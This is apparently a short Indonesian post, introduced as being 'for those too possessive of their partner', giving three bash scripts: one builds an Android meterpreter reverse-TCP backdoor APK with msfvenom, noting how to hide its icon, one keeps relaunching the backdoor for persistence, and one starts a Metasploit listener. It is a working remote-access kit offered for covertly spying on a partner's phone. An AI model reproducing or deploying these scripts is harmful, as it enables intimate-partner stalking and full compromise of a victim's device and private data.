untuk mereka yang terlalu posesif terhadap pacarnya
#!/bin/bash
set -e
#: IP Attacker
lanip=$(ifconfig wlp3s0 | grep 'inet ' | awk '{print $2}' | cut -c 6-)
#: port listening milik attacker
LPORT=4444
#: nama file apk
OFILE='backdoor.apk'
echo -e "[+] Listener: ${lanip}"
echo -e "[+] Listener Port: ${LPORT}"
#: build apk
msfvenom --platform android \
-a dalvik \
-p android/meterpreter/reverse_tcp \
LHOST=${lanip} \
LPORT=${LPORT} \
AndroidHideAppIcon=false \ #: ganti ke true untuk menyembunyikan icon aplikasi.
R \
> ${OFILE}
echo -e "[!] Done. Saved as ${OFILE}"
save as "build-apk.sh"
#!/bin/bash
while :
#: jalanin intent milik backdoor
do am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
save as "persistence.sh"
#!/bin/bash
#: IP Attacker.
lanip=$(ifconfig wlp3s0 | grep 'inet ' | awk '{print $2}' | cut -c 6-)
#: port listening.
LPORT=4444
#: payload yang digunakan pada backdoor
PAYLOAD='android/meterpreter/reverse_tcp'
#: jalankan metasploit
msfconsole -x "use multi/handler; set LHOST ${lanip}; set LPORT ${LPORT}; set PAYLOAD ${PAYLOAD}; set ExitOnSession false; exploit"
save as "handler.sh"